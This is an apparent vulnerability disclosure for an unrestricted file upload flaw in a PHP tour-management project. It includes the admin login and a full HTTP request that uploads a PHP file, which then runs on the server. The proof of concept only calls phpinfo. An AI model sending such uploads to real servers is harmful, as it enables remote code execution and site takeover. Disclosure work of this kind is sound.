Online Tours & Travels Management System ab.php unrestricted upload

Online Tours & Travels Management System ab.php unrestricted upload

vendors: https://www.sourcecodester.com/php/14510/online–tours–travels–management–system–project–using–php–and–mysql.htm

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)
Vulnerability url: ip/tour/admin/ab.php

Request package for file upload:

POST /OTMSP-Final-source-code/sourcecode/tour/admin/operations/aa.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2293274527734505501588775325
Content-Length: 357
Origin: http://localhost
Connection: close
Referer: http://localhost/OTMSP-Final-source-code/sourcecode/tour/admin/ab.php
Cookie: PHPSESSID=orctgl8jtqmkpcvehrbapg6po2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------2293274527734505501588775325
Content-Disposition: form-data; name="img"; filename="123.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------2293274527734505501588775325
Content-Disposition: form-data; name="submit"


-----------------------------2293274527734505501588775325--

The files will be uploaded to this directory touradminimg

We visited the directory of the file in the browser and found that the code had been executed

代码007普通

打赏 收藏 海报 链接